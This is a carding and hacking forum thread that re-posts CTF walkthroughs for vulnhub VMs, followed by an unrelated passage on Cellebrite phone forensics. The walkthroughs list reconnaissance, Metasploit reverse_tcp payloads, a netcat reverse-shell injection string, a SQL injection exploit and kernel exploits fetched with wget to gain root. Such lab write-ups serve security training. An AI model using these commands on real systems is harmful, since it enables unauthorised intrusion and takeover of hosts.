+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Hack the Nightmare VM (CTF Challenge) (/Thread-Guide-How-to-Hack-the-Nightmare-VM-CTF-Challenge)
[Guide] How to Hack the Nightmare VM (CTF Challenge) - NINZA - 05-02-2020
Today we are going to solve Wallaby’s Nightmare CTF which is a new VM challenge of vulnhub where the attacker has to achieve root flag of the targeted VM machine; you can download it from
[To see content please register here]
.Table of Content
- Network Scanning (Netdiscover, Nmap)
- Abusing HTTP service for LFI Vulnerability
- Web Directory Enumeration (Dirb)
- Exploiting RCE (Metasploit)
- Kernel Privilege Escalation
As we always start from the network so that we can have a target IP. In your Kali Linux open the terminal and type netdiscover, now from the screenshot you can see a list of IP. Here 192.168.0.101 is my target IP.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-K3xqr9lzIGc/WO5gK8cjXWI/AAAAAAAAPx0/-UgfXLVNmic4NWH-snwybWEm8I1JFhEUwCLcB/s1600/1.png?w=687&ssl=1)
Enumerate the target through aggressive scan; type following command for nmap scanning:
nmap -p- -A 192.168.0.101
1
nmap -p- -A 192.168.0.101
So here I found three ports 22, 80, 6667 are open.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-ffD01Tu8JPE/WO5gM-E2-tI/AAAAAAAAPyg/qREeolhb8-gsn-IHTvtsqXBt2vDFjyxSACLcB/s1600/2.png?w=687&ssl=1)
Since port 80 is open I look toward browser and explore target IP 192.168.0.101 where I found a comment “enter a username to get started with this CTF” then I type the name “RAJ” and click on submit so that we could move forward into start the game.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-4tDv_yP2Ijw/WO5gMroSuhI/AAAAAAAAPyY/JcaOtYrd7e4rw3yOMKa8UV-y3nVGwVHNwCLcB/s1600/3.png?w=687&ssl=1)
When I clicked on submit tab is linked to next web page where you can read the assigned username for this CTF from screenshot now we can start this CTF when we will click on given link start the CTF!
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-ILLt7dFTRZY/WO5gM0WlpMI/AAAAAAAAPyc/zLV-k-_R4Akz5wN5a6MYHJXF0cw0ONykwCLcB/s1600/4.png?w=687&ssl=1)
Next web page open with an exclusive warning that Mr. Wallaby found raj is trying to penetrate inside the server so user “raj” is under his observation. Then soon after reading this threat, I observe at its URL I thought it might be vulnerable to etc/passwd same as LFI attack.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-KaDcXWyRTkQ/WO5gNDhV6hI/AAAAAAAAPyk/Bn-hzYCuJu4isXDFZGap2lO04BIzSHuwQCLcB/s1600/5.png?w=687&ssl=1)
Then I try browse following in URL 192.168.1.101/?page=/etc/passwd though the web page stands up with raw data nothing was quite useful on this web page. And when I refresh it I lose connection from port 80. As raj was threatened by Wallaby ?
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-OIEhB0m23Y4/WO5gNVCG1jI/AAAAAAAAPyo/SWX-HC0pGAAy1Nr6D_OpF_xTsRYcIENbACLcB/s1600/6.png?w=687&ssl=1)
Again I move toward nmap so that I can make sure about port 80 but here I found a new port 60080 is open for http service as you can perceive this thing from the given screenshot.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-5Z07WfAsf2I/WO5gNboUMhI/AAAAAAAAPys/HXnHa75-qkcaq-brHeGnjtMiW_A6puLdgCLcB/s1600/7.png?w=687&ssl=1)
Then I next to my next tool dirb
dirb
[To see content please register here]
=1
dirb
[To see content please register here]
=Now from the screenshot, you can see the result and currently we will look toward highlighted directory.
![[Image: 8.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-gKrrhmQ2Fj4/WO5gN8as_8I/AAAAAAAAPyw/xy3neeAibiAHzSqybNBcpopCecMg6Vi9wCLcB/s1600/8.png?w=687&ssl=1)
So when I browse 192.168.0.101:60080/?page=mailer in URL the resultant web page gets opened and I found nothing special here except “coming soon, guys!”
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-MuQlp02JB78/WO5gNyXnrxI/AAAAAAAAPy0/T-ZHK9VF-p0EcUdhanFocJPRMfAcvX25QCLcB/s1600/9.png?w=687&ssl=1)
Then I look after page source code to get some clue, here inside HTML code the anchor tag contains a link for another file which you can see from the screenshot.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-ZdlmYZ9JaEU/WO5gKy-VDjI/AAAAAAAAPx8/YYFapnROHgMB09tyLWZnYy5sFDPYRZpAwCLcB/s1600/10.png?w=687&ssl=1)
Again I browse above highlighted text 192.168.0.101:60080/?mailer&mail=pwd in URL and the web page comes outside with /var/www/html
Hence we can say that the current page might good for executing malicious comment as a command.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-VhXGFfNB4mM/WO5gK6XVd-I/AAAAAAAAPx4/YJZ-S1FvQKUHdlwVSzwHlxgi41q__OWxQCLcB/s1600/11.png?w=687&ssl=1)
Now load Metasploit framework to connect with the victim through reverse connection
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)>set lhost 192.168.0.106
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>exploit
1
2
3
4
5
6
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 1
msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp
msf exploit (web_delivery)>set lhost 192.168.0.106
msf exploit (web_delivery)>set lport 4444
msf exploit (web_delivery)>exploit
Now copy the generated command php….UvrG’));” and send it to target
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-0zW5qKAAqvo/WO5gLqo7ylI/AAAAAAAAPyE/BDWyLdwO2eAUqAqHR8Jhx4CtJXL8irqegCLcB/s1600/12.png?w=687&ssl=1)
From the screenshot, you can see I have pasted above malicious PHP comment inside URL in hope to get a reverse connection inside Metasploit.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-RABdTYGYA9g/WO5gLX8ryCI/AAAAAAAAPyA/mKgMxHsDf40FU3MIJZkA68iTmf0oF3pvQCLcB/s1600/13.png?w=687&ssl=1)
So when I execute this comment I receive meterpreter session and get connected with victim shell
meterpreter> sysinfo
meterpreter> shell
1
2
meterpreter> sysinfo
meterpreter> shell
Code:
The contents of this section are hidden for your groupRegister or Login
Now use “Dirty cow exploit” therefore type the following command to download this exploit inside tmp folder of the victim.
wget
[To see content please register here]
1
wget
[To see content please register here]
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-MAR7YMl4O-A/WO5gMJ80WVI/AAAAAAAAPyM/e7D2kewDChsAs2q4TzsAKyGutk4PEoELgCLcB/s1600/15.png?w=687&ssl=1)
Now type the following command to compile your exploit so that it can run successfully inside.
gcc cowroot.c –o cowroot -pthread
1
gcc cowroot.c –o cowroot -pthread
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-xuyRZ8Ld8uQ/WO5gMLfDUYI/AAAAAAAAPyQ/MUaWPq2aXzIdtGucUF_69mP9Avvk9t5YACLcB/s1600/16.png?w=687&ssl=1)
Now we can run our exploit to achieve root permission and try to capture the flag
./cowroot
id
cd /root
ls
cat flag.txt
1
2
3
4
5
./cowroot
id
cd /root
ls
cat flag.txt
Congratulation!!! We have captured the flag which you can see from the screenshot and beat this task………..
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-bFZ1FjK9anY/WO5gMT8Lb-I/AAAAAAAAPyU/dSS3SZEwzqoTDJkUv_GhGftULRYTayBkgCLcB/s1600/17.png?w=687&ssl=1)
Hi friends! Today we are going to face Bot challenge in new VM machine of vulnhub design by Mr. Brian Wallace. In this tutorial you will how to access root privilege by generating malicious bot. you can download this challenge from
[To see content please register here]
.Let’s start!!!
Open the terminal of Klai Linux to Identify the target in your network using netdiscover command.
netdiscover
1
netdiscover
From screenshot you can see the highlighted target IP : 192.168.1.105
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-5uG2rqETJ2w/WO46HnH1PAI/AAAAAAAAPwk/Q44DhHqHb3EKkoNplvQbD1dz63LWjgWsgCLcB/s1600/1.png?w=687&ssl=1)
Enumerate open port of targeted IP using nmap therefore type following command:
nmap -p- -Pn 192.168.1.105
1
nmap -p- -Pn 192.168.1.105
From its scanning result we come to know that port 22, 80, 111, 55844 are open ports.
![[Image: 2.1.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-_3Q-wG_Wftk/WO46JB45cJI/AAAAAAAAPxI/C5foXnJ9iSU_vfyKPw_KEknYqp6WVoAPACLcB/s1600/2.1.png?w=687&ssl=1)
Seeing as port 80 is open I come across towards browser and look at target IP 192.168.1.105. Here the web page was pointing out towards two more different links “Panel” and “Dexter Analysis for a different botnet”.
When I visit to second link it was redirected to another website and I found this link is not for our use but when I click on “panel” this linked me to a login page.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-fPiu9O0OcM4/WO46JTFpusI/AAAAAAAAPxM/v4c3RomZB4cdIrn8er7_K11LCVZYbqa0gCLcB/s1600/2.png?w=687&ssl=1)
So now I was at login page and I have no idea for its username: password here I also try sql login form injection but couldn’t breach this login page.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-eYrPItiDCUc/WO46JmZPYYI/AAAAAAAAPxU/scsZ2CNCj2YIJxa9DlYngpAUPZknbW27QCLcB/s1600/3.png?w=687&ssl=1)
Now next I choose dirbuster for directory brute force attack to step forward in expectation to get some directories inside it.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-I6DR5J6KagQ/WO46Jx6TCiI/AAAAAAAAPxY/92B973SsQz00fv2GbMqOG3FFSl9WtD_WQCLcB/s1600/5.png?w=687&ssl=1)
From screenshot you can perceive the files and directories which I found through brute force attack. Next we need to explore these directories in browser so that we can find our any clue to breach login page.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-BWlGssfmae0/WO46KPlPh8I/AAAAAAAAPxc/X3kSWD7rYaswjxaOoj7yk_e0plUzY-WHwCLcB/s1600/6.png?w=687&ssl=1)
I start with upload.php where we can upload our malicious file or backdoor as you can see from screenshot I try to upload hacked.php file but nothing happened. Then I try to explore another directory but unable to find any clue regarding this task.
When I investigate more, then after wasting much I found apart from all directories only gateway.php was suffering from blind SQL injection vulnerable but here the post parameter was encoded with base 64.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-vdaLjn55SV4/WO46KCOyljI/AAAAAAAAPxg/Q8eMe5cvIb4E0ukOQ4vAO1Qw1whH0HtewCLcB/s1600/7.png?w=687&ssl=1)
Now attacker has two options either configure sqlmap to retrieve credential or download relevant exploit Dexter Casino Loader SQL Injection given by Brian Wallace. I had use this exploit to find out login credential. You can download it from
[To see content please register here]
.![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-Z9rizHFJZZQ/WO46Kf8rVlI/AAAAAAAAPxk/jEzMwrXZRG8QqAB2ocLqfgQnE2ogSMeMgCLcB/s1600/9.png?w=687&ssl=1)
Once you have downloaded it then type following command in terminal:
python 31686.py dump
[To see content please register here]
1
python 31686.py dump
[To see content please register here]
Now you will get login credential for bot panel.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-v2RfPXnvW38/WO46HktkjjI/AAAAAAAAPwg/FFJRmwXuCa4Qva-pX2uqX7jVCeR3dgYXACLcB/s1600/10.png?w=687&ssl=1)
Then I typed above fetched username and password into login form.
![[Image: 11.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-dj_vAO0yUA8/WO46HnS9RNI/AAAAAAAAPwc/gCfxSrZhd1cWkG10Aan5s8lDwF6RGKG5QCLcB/s1600/11.png?w=687&ssl=1)
The panel has three basic features; bot control, dump viewer, and file upload. Without wasting time I click on upload options.
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/--3cxCdR-w4E/WO46IKzpp9I/AAAAAAAAPwo/SPjlwaePaQsyGYA1uDZruTV-ocSd5z-bQCLcB/s1600/12.png?w=687&ssl=1)
Now again I will try to upload php backdoor so that we get reverse connection of target system.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-0fsxOpz4FD8/WO46INaDYWI/AAAAAAAAPws/nh5HJRP5RFgqPZP3poGk5SnWJHrddJR4QCLcB/s1600/13.png?w=687&ssl=1)
Now use msfvenom to generate malicious PHP script and type following command.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 –f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.106 lport=4444 –f raw
From screenshot you can read the generated PHP script, at this instant we need to copy the text highlighted text further we will past it inside text document and saved with shell.php and multi handler inside metasploit.
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-OxIEU-NxTZc/WO46ICFdxtI/AAAAAAAAPww/UeZFECe0KDgp3aHR9Fpnmz9EWqNeTPVhwCLcB/s1600/14.png?w=687&ssl=1)
Now go back to upload directory and upload shell.php now you can see from given image the shell.php file is successfully upload inside /panel/exes.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-NNbG80h1p18/WO46Itve_yI/AAAAAAAAPw0/lZGrX8F5l58s2T0K1iaULAy3rc0EUflxACLcB/s1600/15.png?w=687&ssl=1)
Here we are going to execute shell.php which gives reverse connection in metasploit framework.
192.168.0.105/panel/exes
1
192.168.0.105/panel/exes
![[Image: 16.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-TsFm0MBxlmU/WO46Im1VVWI/AAAAAAAAPw4/eBKabjqr3xUkiNOtXKP54vBdXJqoLjkcQCLcB/s1600/16.png?w=687&ssl=1)
Awesome! We have victim’s metrepreter session
metrepreter > ls
metrepreter > cd /var/www
metrepreter > ls
1
2
3
metrepreter > ls
metrepreter > cd /var/www
metrepreter > ls
Inside /var/www I found my bot file antitamper.list, now first we will download it
metrepreter >download antitamper.list /root/Desktop
1
metrepreter >download antitamper.list /root/Desktop
![[Image: 17.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-jgvN2lOKAhY/WO46IhijcKI/AAAAAAAAPw8/GPeUyAxEylUqTOdpo9cdL3GKCwT_b4gqwCLcB/s1600/17.png?w=687&ssl=1)
Here you can read the downloaded file then add you malicious bot inside it
![[Image: 18.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-SsFIaqyxvSA/WO46JHzi0LI/AAAAAAAAPxE/CJlsmbA2FbMbuTkpuR1UfvGSdejG-4WjgCLcB/s1600/18.png?w=687&ssl=1)
Now I have add my malicious bot then upload it again inside /var/www and start netcat for reverse connection then run antitamper.py
"shell": "'; /bin/nc -e /bin/sh 192.168.1.104 4444 #",
1
"shell": "'; /bin/nc -e /bin/sh 192.168.1.104 4444 #",
![[Image: 19.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-cQ0UY0dOLss/WO46JGf2wMI/AAAAAAAAPxA/CcV3XgL20NgNYLP8bi6M4F8PKXtT9r7YQCLcB/s1600/19.png?w=687&ssl=1)
nc –nlvp 4444
id
1
2
nc –nlvp 4444
id
Hurray!!! We have got root connection.
![[Image: 20.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-zXJX4pA9Fto/WO46Jn9uzlI/AAAAAAAAPxQ/SxEKv2DGOow3_ZiuE9fWBB37ofkfNR4zwCLcB/s1600/20.png?w=687&ssl=1)
Top HatSec built a VM image “Fartknocker” and kept the challenge to capture the flag in his machine. This VM box is mainly designed for testing your network penetration skills, before solving this challenge you must know about network packet analysis and port knocking.
Let’s begin!
Scan your network using the netdiscover command I found an IP address 192.168.1.25 in my network.
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-ooZhw-ryVBs/WOaB5ThEDqI/AAAAAAAAPu0/nd4AWGZ02F8frSsXuv6LvWQnu49PFEWQQCLcB/s1600/1.png?w=687&ssl=1)
Enumerate the target through aggressive scan; type following command for nmap scanning:
nmap -p- -A 192.168.1.25
1
nmap -p- -A 192.168.1.25
So here I found only single port 80 is open
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-j1CqpZPYPDI/WOaB73d2ioI/AAAAAAAAPvg/nGNnyyJTj8MF7FscaCCZYZhcgpqUY1tUACLcB/s1600/2.png?w=687&ssl=1)
Since port 80 is open I look toward browser and explore target IP 192.168.1.25, here I got a Link “Woah” without wasting time I just clicked on it.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-cbh_YM9c71M/WOaB85dQubI/AAAAAAAAPv0/J1_xfvrWNRIwNMp_8W0WKVWOBEKqwYWwQCLcB/s1600/3.png?w=687&ssl=1)
Link Woah contains a pcap1.pcap file; I download it to find out some clue.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-aotgGLpjLS8/WOaB9blSl3I/AAAAAAAAPv4/oPI9sft3elsPpGEyud8IFpMIzLSmXmEhwCLcB/s1600/4.png?w=687&ssl=1)
This file open with Wireshark here I distinguish that VM box trying to connect over TCP ports 7000, 8000, and 9000. Behind the machine efforts on those 3 ports it gets discarded and some obstructed attempts on a connection RST, ACK; when I dig out more I found this technique is known as port knocking.
Port 7000 is used for connection but rejected.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-HViC5nXjVLY/WOaB9Tq1jhI/AAAAAAAAPv8/9PcJAafX1lcgzC0uHT1KLW-VYTnMFpQTACLcB/s1600/5.png?w=687&ssl=1)
Port 8000 is used for connection but rejected.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-3uwrYMYXqSk/WOaB9tMMQqI/AAAAAAAAPwI/xMw3g_37sT4INApj84sBxTf9UjxcZwLRwCLcB/s1600/6.png?w=687&ssl=1)
Port 9000 is used for connection but rejected.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-QmLzgQb0gx0/WOaB99SFl4I/AAAAAAAAPwA/als4DYz0SxI21tJzy8zuZPJN4bI4JEyIwCLcB/s1600/7.png?w=687&ssl=1)
Now send packets to 7000, 8000, 9000 so that these ports sequence will open another port. Therefore type the following command for nmap to perform a Sequential Port Scan.
nmap -r -p 7000,8000,9000 192.168.1.25
1
nmap -r -p 7000,8000,9000 192.168.1.25
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-Owag9HbZKr0/WOaB94X7SrI/AAAAAAAAPwE/xbb33VBMhwsDSKy-gmXXA_ir7V9uBZ5VQCLcB/s1600/8.png?w=687&ssl=1)
Once again scan target machine using aggressive scan.
nmap -p- -A 192.168.1.25
1
nmap -p- -A 192.168.1.25
Great! Here we can see 8888 is open now and from the screenshot, you read a new directory /burgerworld/
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-wABZ0p3qB7w/WOaB-iB4nsI/AAAAAAAAPwM/4-K0W_VG2FwLaGwi2lLzG_oDdzGgZEwDwCLcB/s1600/9.png?w=687&ssl=1)
Then I run towards browser to explore 192.168.1.25/burgerworld/ this time again I found another link heheh..hehh that contains one more pcap file again I download that pcap2.pcap file.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-FBG8HIxEs9g/WOaB5iI4kMI/AAAAAAAAPu4/GlTTpZo7F6UsHR6oP_7MKozyYE0VnhRuQCLcB/s1600/10.png?w=687&ssl=1)
Now the game is very clear Top HatSec had involved port knowing at each step, again I opened the pcap2 file with Wireshark but this time I didn’t found any port knocking sequence, therefore, I randomly select a packet to follow it TCP stream. Here you can select any packet to make right click on it and choose to follow option.
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-vM3KW8x3exc/WOaB5kVKBoI/AAAAAAAAPu8/14_EifaDVp48j89MDkt3m7EYwNEtEZUfQCLcB/s1600/11.png?w=687&ssl=1)
TCP stream captured the following image point towards another clue through CAN YOU UNDERSTAND MY MESSAGE!
Hush! His message was in the German language!
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-pp5f5O4htSM/WOaB6QkTXmI/AAAAAAAAPvI/5g4YVZ1O4kAsLhi2WxePDb89_Y3CgkG6QCLcB/s1600/12.png?w=687&ssl=1)
When I translate it I got one three three seven. This port 1337 could be another knocking port.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-zivNlyEePNQ/WOaB6QJK2DI/AAAAAAAAPvE/amZBetI-WQwegm0iFvFiAzc_B3qEYMTnQCLcB/s1600/13.png?w=687&ssl=1)
Again type the following command for nmap to perform a Sequential Port Scan.
nmap -r -p 1337 192.168.1.25
1
nmap -r -p 1337 192.168.1.25
Oooh!!! It is showing waste service means to perform a Sequential Port Scan fail to knock 1337.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-c1n4n_cRWsg/WOaB6Ow4QFI/AAAAAAAAPvA/cT2dkpwzleIK0GveQy85DAkJdwMb8aUlQCLcB/s1600/14.png?w=687&ssl=1)
Use another way “netcat” to knock port 1337:
nc -nv 192.168.1.25 1337
1
nc -nv 192.168.1.25 1337
But connection refused now try the single port number.
nc –nv 192.168.1.25 1
nc –nv 192.168.1.25 3
nc –nv 192.168.1.25 3
nc –nv 192.168.1.25 7
1
2
3
4
nc –nv 192.168.1.25 1
nc –nv 192.168.1.25 3
nc –nv 192.168.1.25 3
nc –nv 192.168.1.25 7
Finally, port 1337 get opened which points towards /iamcornholio/
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-tfVtKSYWKW0/WOaB7AoAi2I/AAAAAAAAPvU/8VbB8JqkUzECRhxWBhUoy7xMGQ0IIeNUgCLcB/s1600/15.png?w=687&ssl=1)
Now Explore
192.168.1.25/iamcornholio/
1
192.168.1.25/iamcornholio/
This time I found a base 64 encode string which should be decoded so that we can move forward.
![[Image: 16.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-20B5nweOsx0/WOaB6ulH3ZI/AAAAAAAAPvM/-CuI--wBvPYdm4xEoTrH2pjwCXdYZPD-gCLcB/s1600/16.png?w=687&ssl=1)
I took the help of burp suite to decode this string “T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK” and what I found was quite interesting.
Open up SSH: 8888 9999 7777 6666
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/--xW0bjRZMU4/WOaB64hFQuI/AAAAAAAAPvQ/IcsTxEsEmfMUZrctAenrDmpRlZGHvBtKQCLcB/s1600/17.png?w=687&ssl=1)
Again Use “netcat” to knock the following port:
nc –nv 192.168.1.25 8888
nc –nv 192.168.1.25 9999
nc –nv 192.168.1.25 7777
nc –nv 192.168.1.25 6666
1
2
3
4
nc –nv 192.168.1.25 8888
nc –nv 192.168.1.25 9999
nc –nv 192.168.1.25 7777
nc –nv 192.168.1.25 6666
![[Image: 18.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-R8HcXLaId4Q/WOaB7S8NiII/AAAAAAAAPvc/ZgnBTCmWgxUDROAZIBpurRFw943DV9ohgCLcB/s1600/18.png?w=687&ssl=1)
From the screenshot you can I have used version scan for the target.
nmap -sV 192.168.1.25
1
nmap -sV 192.168.1.25
Awesome port 22 is opened for SSH
![[Image: 19.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-L9Eg46UTM88/WOaB7cWZzVI/AAAAAAAAPvY/ZXgNkt9AKDwXoymWZNatuJ4ICtiReVl-wCLcB/s1600/19.png?w=687&ssl=1)
Now try to connect with the target through
ssh -l butthead 192.168.1.25 /bin/bash
1
ssh -l butthead 192.168.1.25 /bin/bash
Here I got successfully login now type the following command
ls
uname -a
1
2
ls
uname -a
I Found kernel version 3.13.0 now let’s find out whether there is an exploit related to its present or not.
![[Image: 21.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-crYWvOUTfME/WOaB8K1_b3I/AAAAAAAAPvk/91_UOZLZRLkRBHGGyUHMegHkwAFQli5KgCLcB/s1600/21.png?w=687&ssl=1)
With the help of Google, I found an exploit from the screenshot you can see the link for “ofs 32” click on it to download this exploit that allows a local user to take administration privilege.
![[Image: 22.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-eims5EXBYiU/WOaB8GObdxI/AAAAAAAAPvo/3zBW3MOP7og7uBDBwxYBSEeBdCLw8uYhACLcB/s1600/22.png?w=687&ssl=1)
Now type the following command to download ofs 32 inside the victim’s system and then achieve root privileges to capture the flag.
wget
[To see content please register here]
ls./ofs_32
1
2
3
wget
[To see content please register here]
ls./ofs_32
![[Image: 23.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-pbD-3b-JRJU/WOaB8lfydbI/AAAAAAAAPvs/DVzu71zIQgcjlcuLj5sv6R1FfMYvnQM0wCLcB/s1600/23.png?w=687&ssl=1)
id
cd /root
ls
cat secretz
SECRET = "LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK"
1
2
3
4
5
id
cd /root
ls
cat secretz
SECRET = "LIVE LONG AND PROSPER, REST IN PEACE MR. SPOCK"
!!This was very curies and most challenging machine!!
![[Image: 24.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-MsdSce-2fr0/WOaB8qC2lbI/AAAAAAAAPvw/7Lm2SbgOgw8tk7I3RWKuGaVnlwa_HlPFwCLcB/s1600/24.png?w=687&ssl=1)
The manifold increase in the mobile penetration amongst the world population has interested people from all works of life namely mobile manufactures, service providers, application developers and more to this industry. Thequantum jump inthe user base and its usage of mobile has even caught the eye of Forensic Experts.
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-9TRH_NY-nrk/WOUISCad2PI/AAAAAAAAPtk/N6wFdjHh8FM1k2eYkUBitHcGc5qA9hgaQCLcB/s1600/1.png?w=687&ssl=1)
In this article we will conduct a mobile investigation of ONE Plus mobile model by applying Cellebrite UFED software.
As a preliminary process, adjustments need to be undertaken on the mobile model under surveillance. The investigator attaches the mobile to his/her laptop through the phone cable.The investigator needs to open the ‘About Phone’ section under Setting and scroll down the various options till he reaches the ‘Build Option’, he needs to tap the ‘Build Option’ seven (7) times which opens a new section – the ‘Developer Option’. Before commencing Cellebrite software, the investigator must check whether the mobile commands ‘Stay Awake’ and Debugging (USB debugging) are ON.
![[Image: 0.jpg?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-0BVKkmOWjKY/WOUISbup0eI/AAAAAAAAPts/urYBbp3NwzgmkTugdU__45sgN3CqIw2-wCLcB/s1600/0.jpg?w=687&ssl=1)
After completing the following steps, the investigator inserts the licensed Cellebrite USB Key in the laptop which displays five choices namely- Mobile device, SIM Card, USB device or Memory Card, UFED Camera and Device Tool.
We choose ONE Plus mobile model to demonstrate the Cellebrite software. After configuration the software on the laptop, the software displayed seven ONE Plus models to select our model.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-5azUDvEmLhc/WOUIToHCrJI/AAAAAAAAPuI/avYsamuqUOgtPmNnzKqEYnyAkU8WqIFlQCLcB/s1600/2.png?w=687&ssl=1)
Since our mobile is ONE Plus 3 A3003 model, we put it for the forensic investigation. In order to gather information, the Cellebrite software provided us with five ‘Extraction’ choices ranging from Logical Extraction, File System Extraction, Physical Extraction (Root), Capture Images, Capture Screen Shots which are easy to understand and implement.
It is recommended that the investigator must click on Logical Extraction followed by Physical Extraction to gather information.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-igAZ1dSEMzg/WOUITrMAvAI/AAAAAAAAPuM/pPF1BRR2groEz09lJQrdWSZjNvpuYGw2QCLcB/s1600/4.png?w=687&ssl=1)
For our demonstration, we selected the Logical Extraction and selected three types of information from the Phone Memory likePhone (Phone Book), SIM (Phone Book) and Phone (Content) and press Next.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-eySnG5mBiB8/WOUITw98ccI/AAAAAAAAPuQ/IPD5iz0f_NYp_JywFLwok-tDWD0iRCkxwCLcB/s1600/5.png?w=687&ssl=1)
The Logical Extraction gave a further choice to select the type of information from the Phone Memory namely Contacts, SMS, MMS, Calendar, Apps Data, Pictures, Audio/Music, Videos, Ringtones and Call Logs.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-qY9UpPPv7K4/WOUIUD6SyNI/AAAAAAAAPuU/44-Emctt-h8Ikv3XJ9dXaHGfs1mwHXSKwCLcB/s1600/7.png?w=687&ssl=1)
The software sends a ‘pop up’ message and in order to move further the investigator needs to click on YES.
